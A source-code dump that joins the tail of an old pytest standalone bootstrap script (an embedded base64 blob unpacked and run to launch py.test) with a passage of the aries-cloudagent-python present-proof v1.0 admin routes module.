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
<KEY>
"""
import sys
import base64
import zlib
class DictImporter(object):
def __init__(self, sources):
self.sources = sources
def find_module(self, fullname, path=None):
if fullname == "argparse" and sys.version_info >= (2,7):
# we were generated with <python2.7 (which pulls in argparse)
# but we are running now on a stdlib which has it, so use that.
return None
if fullname in self.sources:
return self
if fullname + '.__init__' in self.sources:
return self
return None
def load_module(self, fullname):
# print "load_module:", fullname
from types import ModuleType
try:
s = self.sources[fullname]
is_pkg = False
except KeyError:
s = self.sources[fullname + '.__init__']
is_pkg = True
co = compile(s, fullname, 'exec')
module = sys.modules.setdefault(fullname, ModuleType(fullname))
module.__file__ = "%s/%s" % (__file__, fullname)
module.__loader__ = self
if is_pkg:
module.__path__ = [fullname]
do_exec(co, module.__dict__) # noqa
return sys.modules[fullname]
def get_source(self, name):
res = self.sources.get(name)
if res is None:
res = self.sources.get(name + '.__init__')
return res
if __name__ == "__main__":
if sys.version_info >= (3, 0):
exec("def do_exec(co, loc): exec(co, loc)\n")
import pickle
sources = sources.encode("ascii") # ensure bytes
sources = pickle.loads(zlib.decompress(base64.decodebytes(sources)))
else:
import cPickle as pickle
exec("def do_exec(co, loc): exec co in loc\n")
sources = pickle.loads(zlib.decompress(base64.decodestring(sources)))
importer = DictImporter(sources)
sys.meta_path.insert(0, importer)
entry = "import py; raise SystemExit(py.test.cmdline.main())"
do_exec(entry, locals()) # noqa
``` |
{
"source": "josephboyle/aries-cloudagent-python",
"score": 2
} |
#### File: present_proof/v1_0/routes.py
```python
import json
from uuid import uuid4
from aiohttp import web
from aiohttp_apispec import docs, request_schema, response_schema
from marshmallow import Schema, fields
from ....connections.models.connection_record import ConnectionRecord
from ....holder.base import BaseHolder
from ....messaging.decorators.attach_decorator import AttachDecorator
from ....messaging.valid import (
INDY_CRED_DEF_ID,
INDY_DID,
INDY_PREDICATE,
INDY_SCHEMA_ID,
INDY_VERSION,
INT_EPOCH,
UUIDFour,
)
from ....storage.error import StorageNotFoundError
from .manager import PresentationManager
from .messages.inner.presentation_preview import (
PresentationPreview,
PresentationPreviewSchema,
)
from .messages.presentation_proposal import PresentationProposal
from .messages.presentation_request import PresentationRequest
from .models.presentation_exchange import (
V10PresentationExchange,
V10PresentationExchangeSchema,
)
class V10PresentationExchangeListSchema(Schema):
"""Result schema for an Aries#0037 v1.0 presentation exchange query."""
results = fields.List(
fields.Nested(V10PresentationExchangeSchema()),
description="Aries#0037 v1.0 presentation exchange records",
)
class V10PresentationProposalRequestSchema(Schema):
"""Request schema for sending a presentation proposal admin message."""
connection_id = fields.UUID(
description="Connection identifier", required=True, example=UUIDFour.EXAMPLE,
)
comment = fields.Str(
description="Human-readable comment", required=False, default=""
)
presentation_proposal = fields.Nested(PresentationPreviewSchema(), required=True)
auto_present = fields.Boolean(
description=(
"Whether to respond automatically to presentation requests, building "
"and presenting requested proof"
),
required=False,
default=False,
)
class IndyProofReqSpecRestrictionsSchema(Schema):
"""Schema for restrictions in attr or pred specifier indy proof request."""
credential_definition_id = fields.Str(
description="Credential definition identifier",
required=True,
**INDY_CRED_DEF_ID
)
schema_id = fields.String(
description="Schema identifier", required=False, **INDY_SCHEMA_ID
)
schema_issuer_did = fields.String(
description="Schema issuer (origin) DID", required=False, **INDY_DID
)
schema_name = fields.String(
example="transcript", description="Schema name", required=False
)
schema_version = fields.String(
description="Schema version", required=False, **INDY_VERSION
)
issuer_did = fields.String(
description="Credential issuer DID", required=False, **INDY_DID
)
cred_def_id = fields.String(
description="Credential definition identifier",
required=False,
**INDY_CRED_DEF_ID
)
class IndyProofReqNonRevoked(Schema):
"""Non-revocation times specification in indy proof request."""
from_epoch = fields.Int(
description="Earliest epoch of interest for non-revocation proof",
required=True,
**INT_EPOCH
)
to_epoch = fields.Int(
description="Latest epoch of interest for non-revocation proof",
required=True,
**INT_EPOCH
)
class IndyProofReqAttrSpecSchema(Schema):
"""Schema for attribute specification in indy proof request."""
name = fields.String(
example="favouriteDrink", description="Attribute name", required=True
)
restrictions = fields.List(
fields.Nested(IndyProofReqSpecRestrictionsSchema()),
description="If present, credential must satisfy one of given restrictions",
required=False,
)
non_revoked = fields.Nested(IndyProofReqNonRevoked(), required=False)
class IndyProofReqPredSpecSchema(Schema):
"""Schema for predicate specification in indy proof request."""
name = fields.String(example="index", description="Attribute name", required=True)
p_type: fields.String(
description="Predicate type (indy currently supports only '>=')",
required=True,
**INDY_PREDICATE
)
p_value: fields.Integer(
description="Threshold value", required=True,
)
restrictions = fields.List(
fields.Nested(IndyProofReqSpecRestrictionsSchema()),
description="If present, credential must satisfy one of given restrictions",
required=False,
)
non_revoked = fields.Nested(IndyProofReqNonRevoked(), required=False)
class IndyProofRequestSchema(Schema):
"""Schema for indy proof request."""
nonce = fields.String(description="Nonce", required=False, example="1234567890")
name = fields.String(
description="Proof request name",
required=False,
example="Proof request",
default="Proof request",
)
version = fields.String(
description="Proof request version",
required=False,
default="1.0",
**INDY_VERSION
)
requested_attributes = fields.Dict(
description=("Requested attribute specifications of proof request"),
required=True,
keys=fields.Str(example="0_attr_uuid"), # marshmallow/apispec v3.0 ignores
values=fields.Nested(IndyProofReqAttrSpecSchema()),
)
requested_predicates = fields.Dict(
description=("Requested predicate specifications of proof request"),
required=True,
keys=fields.Str(example="0_age_GE_uuid"), # marshmallow/apispec v3.0 ignores
values=fields.Nested(IndyProofReqPredSpecSchema()),
)
class V10PresentationRequestRequestSchema(Schema):
"""Request schema for sending a proof request."""
connection_id = fields.UUID(
description="Connection identifier", required=True, example=UUIDFour.EXAMPLE,
)
proof_request = fields.Nested(IndyProofRequestSchema(), required=True)
comment = fields.Str(required=False)
class IndyRequestedCredsRequestedAttrSchema(Schema):
"""Schema for requested attributes within indy requested credentials structure."""
cred_id = fields.Str(
example="3fa85f64-5717-4562-b3fc-2c963f66afa6",
description=(
"Wallet credential identifier (typically but not necessarily a UUID)"
),
)
revealed = fields.Bool(
description="Whether to reveal attribute in proof", default=True
)
class IndyRequestedCredsRequestedPredSchema(Schema):
"""Schema for requested predicates within indy requested credentials structure."""
cred_id = fields.Str(
example="3<PASSWORD>",
description=(
"Wallet credential identifier (typically but not necessarily a UUID)"
),
)
class V10PresentationRequestSchema(Schema):
"""Request schema for sending a presentation."""
self_attested_attributes = fields.Dict(
description=("Self-attested attributes to build into proof"),
required=True,
keys=fields.Str(example="attr_name"), # marshmallow/apispec v3.0 ignores
values=fields.Str(
example="self_attested_value",
description=(
"Self-attested attribute values to use in requested-credentials "
"structure for proof construction"
),
),
)
requested_attributes = fields.Dict(
description=(
"Nested object mapping proof request attribute referents to "
"requested-attribute specifiers"
),
required=True,
keys=fields.Str(example="attr_referent"), # marshmallow/apispec v3.0 ignores
values=fields.Nested(IndyRequestedCredsRequestedAttrSchema()),
)
requested_predicates = fields.Dict(
description=(
"Nested object mapping proof request predicate referents to "
"requested-predicate specifiers"
),
required=True,
keys=fields.Str(example="pred_referent"), # marshmallow/apispec v3.0 ignores
values=fields.Nested(IndyRequestedCredsRequestedPredSchema()),
)
@docs(tags=["present-proof"], summary="Fetch all present-proof exchange records")
@response_schema(V10PresentationExchangeListSchema(), 200)
async def presentation_exchange_list(request: web.BaseRequest):
"""
Request handler for searching presentation exchange records.
Args:
request: aiohttp request object
Returns:
The presentation exchange list response
"""
context = request.app["request_context"]
tag_filter = {}
if "thread_id" in request.query and request.query["thread_id"] != "":
tag_filter["thread_id"] = request.query["thread_id"]
post_filter = {}
for param_name in (
"connection_id",
"role",
"state",
):
if param_name in request.query and request.query[param_name] != "":
post_filter[param_name] = request.query[param_name]
records = await V10PresentationExchange.query(context, tag_filter, post_filter)
return web.json_response({"results": [record.serialize() for record in records]})
@docs(tags=["present-proof"], summary="Fetch a single presentation exchange record")
@response_schema(V10PresentationExchangeSchema(), 200)
async def presentation_exchange_retrieve(request: web.BaseRequest):
"""
Request handler for fetching a single presentation exchange record.
Args:
request: aiohttp request object
Returns:
The presentation exchange record response
"""
context = request.app["request_context"]
presentation_exchange_id = request.match_info["pres_ex_id"]
try:
record = await V10PresentationExchange.retrieve_by_id(
context, presentation_exchange_id
)
except StorageNotFoundError:
raise web.HTTPNotFound()
return web.json_response(record.serialize())
@docs(
tags=["present-proof"],
summary="Fetch credentials for a presentation request from wallet",
parameters=[
{
"name": "start",
"in": "query",
"schema": {"type": "string"},
"required": False,
},
{
"name": "count",
"in": "query",
"schema": {"type": "string"},
"required": False,
},
{
"name": "extra_query",
"in": "query",
"schema": {"type": "string"},
"required": False,
},
],
)
async def presentation_exchange_credentials_list(request: web.BaseRequest):
"""
Request handler for searching applicable credential records.
Args:
request: aiohttp request object
Returns:
The credential list response
"""
context = request.app["request_context"]
presentation_exchange_id = request.match_info["pres_ex_id"]
referents = request.match_info.get("referent")
presentation_referents = referents.split(",") if referents else ()
try:
presentation_exchange_record = await V10PresentationExchange.retrieve_by_id(
context, presentation_exchange_id
)
except StorageNotFoundError:
raise web.HTTPNotFound()
start = request.query.get("start")
count = request.query.get("count")
# url encoded json extra_query
encoded_extra_query = request.query.get("extra_query") or "{}"
extra_query = json.loads(encoded_extra_query)
# defaults
start = int(start) if isinstance(start, str) else 0
count = int(count) if isinstance(count, str) else 10
holder: BaseHolder = await context.inject(BaseHolder)
credentials = await holder.get_credentials_for_presentation_request_by_referent(
presentation_exchange_record.presentation_request,
presentation_referents,
start,
count,
extra_query,
)
presentation_exchange_record.log_state(
context,
"Retrieved presentation credentials",
{
"presentation_exchange_id": presentation_exchange_id,
"referents": presentation_referents,
"extra_query": extra_query,
"credentials": credentials,
},
)
return web.json_response(credentials)
@docs(tags=["present-proof"], summary="Sends a presentation proposal")
@request_schema(V10PresentationProposalRequestSchema())
@response_schema(V10PresentationExchangeSchema(), 200)
async def presentation_exchange_send_proposal(request: web.BaseRequest):
"""
Request handler for sending a presentation proposal.
Args:
request: aiohttp request object
Returns:
The presentation exchange details
"""
context = request.app["request_context"]
outbound_handler = request.app["outbound_message_router"]
body = await request.json()
connection_id = body.get("connection_id")
try:
connection_record = await ConnectionRecord.retrieve_by_id(
context, connection_id
)
except StorageNotFoundError:
raise web.HTTPBadRequest()
if not connection_record.is_ready:
raise web.HTTPForbidden()
comment = body.get("comment")
# Aries#0037 calls it a proposal in the proposal struct but it's of type preview
presentation_preview = body.get("presentation_proposal")
presentation_proposal_message = PresentationProposal(
comment=comment,
presentation_proposal=PresentationPreview.deserialize(presentation_preview),
)
auto_present = body.get(
"auto_present", context.settings.get("debug.auto_respond_presentation_request")
)
presentation_manager = PresentationManager(context)
(
presentation_exchange_record
) = await presentation_manager.create_exchange_for_proposal(
connection_id=connection_id,
presentation_proposal_message=presentation_proposal_message,
auto_present=auto_present,
)
await outbound_handler(presentation_proposal_message, connection_id=connection_id)
return web.json_response(presentation_exchange_record.serialize())
@docs(
tags=["present-proof"],
summary="Sends a free presentation request not bound to any proposal",
)
@request_schema(V10PresentationRequestRequestSchema())
@response_schema(V10PresentationExchangeSchema(), 200)
async def presentation_exchange_send_free_request(request: web.BaseRequest):
"""
Request handler for sending a presentation request free from any proposal.
Args:
request: aiohttp request object
Returns:
The presentation exchange details
"""
context = request.app["request_context"]
outbound_handler = request.app["outbound_message_router"]
body = await request.json()
connection_id = body.get("connection_id")
try:
connection_record = await ConnectionRecord.retrieve_by_id(
context, connection_id
)
except StorageNotFoundError:
raise web.HTTPBadRequest()
if not connection_record.is_ready:
raise web.HTTPForbidden()
comment = body.get("comment")
indy_proof_request = body.get("proof_request")
if not indy_proof_request.get("nonce"):
indy_proof_request["nonce"] = str(uuid4().int)
presentation_request_message = PresentationRequest(
comment=comment,
request_presentations_attach=[
AttachDecorator.from_indy_dict(indy_proof_request)
],
)
presentation_manager = PresentationManager(context)
(
presentation_exchange_record
) = await presentation_manager.create_exchange_for_request(
connection_id=connection_id,
presentation_request_message=presentation_request_message,
)
await outbound_handler(presentation_request_message, connection_id=connection_id)
return web.json_response(presentation_exchange_record.serialize())
@docs(
tags=["present-proof"],
summary="Sends a presentation request in reference to a proposal",
)
@request_schema(V10PresentationRequestRequestSchema())
@response_schema(V10PresentationExchangeSchema(), 200)
async def presentation_exchange_send_bound_request(request: web.BaseRequest):
"""
Request handler for sending a presentation request free from any proposal.
Args:
request: aiohttp request object
Returns:
The presentation exchange details
"""
context = request.app["request_context"]
outbound_handler = request.app["outbound_message_router"]
presentation_exchange_id = request.match_info["pres_ex_id"]
presentation_exchange_record = await V10PresentationExchange.retrieve_by_id(
context, presentation_exchange_id
)
assert presentation_exchange_record.state == (
V10PresentationExchange.STATE_PROPOSAL_RECEIVED
)
body = await request.json()
connection_id = body.get("connection_id")
try:
connection_record = await ConnectionRecord.retrieve_by_id(
context, connection_id
)
except StorageNotFoundError:
raise web.HTTPBadRequest()
if not connection_record.is_ready:
raise web.HTTPForbidden()
presentation_manager = PresentationManager(context)
(
presentation_exchange_record,
presentation_request_message,
) = await presentation_manager.create_bound_request(presentation_exchange_record)
await outbound_handler(presentation_request_message, connection_id=connection_id)
return web.json_response(presentation_exchange_record.serialize())
@docs(tags=["present-proof"], summary="Sends a proof presentation")
@request_schema(V10PresentationRequestSchema())
@response_schema(V10PresentationExchangeSchema())
async def presentation_exchange_send_presentation(request: web.BaseRequest):
"""
Request handler for sending a presentation.
Args:
request: aiohttp request object
Returns:
The presentation exchange details
"""
context = request.app["request_context"]
outbound_handler = request.app["outbound_message_router"]
presentation_exchange_id = request.match_info["pres_ex_id"]
presentation_exchange_record = await V10PresentationExchange.retrieve_by_id(
context, presentation_exchange_id
)
body = await request.json()
connection_id = presentation_exchange_record.connection_id
try:
connection_record = await ConnectionRecord.retrieve_by_id(
context, connection_id
)
except StorageNotFoundError:
raise web.HTTPBadRequest()
if not connection_record.is_ready:
raise web.HTTPForbidden()
assert (
presentation_exchange_record.state
) == V10PresentationExchange.STATE_REQUEST_RECEIVED
presentation_manager = PresentationManager(context)
(
presentation_exchange_record,
presentation_message,
) = await presentation_manager.create_presentation(
presentation_exchange_record,
{
"self_attested_attributes": body.get("self_attested_attributes"),
"requested_attributes": body.get("requested_attributes"),
"requested_predicates": body.get("requested_predicates"),
},
comment=body.get("comment"),
)
await outbound_handler(presentation_message, connection_id=connection_id)
return web.json_response(presentation_exchange_record.serialize())
@docs(tags=["present-proof"], summary="Verify a received presentation")
@response_schema(V10PresentationExchangeSchema())
async def presentation_exchange_verify_presentation(request: web.BaseRequest):
"""
Request handler for verifying a presentation request.
Args:
request: aiohttp request object
Returns:
The presentation exchange details
"""
context = request.app["request_context"]
presentation_exchange_id = request.match_info["pres_ex_id"]
presentation_exchange_record = await V10PresentationExchange.retrieve_by_id(
context, presentation_exchange_id
)
connection_id = presentation_exchange_record.connection_id
try:
connection_record = await ConnectionRecord.retrieve_by_id(
context, connection_id
)
except StorageNotFoundError:
raise web.HTTPBadRequest()
if not connection_record.is_ready:
raise web.HTTPForbidden()
assert (
presentation_exchange_record.state
) == V10PresentationExchange.STATE_PRESENTATION_RECEIVED
presentation_manager = PresentationManager(context)
presentation_exchange_record = await presentation_manager.verify_presentation(
presentation_exchange_record
)
return web.json_response(presentation_exchange_record.serialize())
@docs(
tags=["present-proof"], summary="Remove an existing presentation exchange record",
)
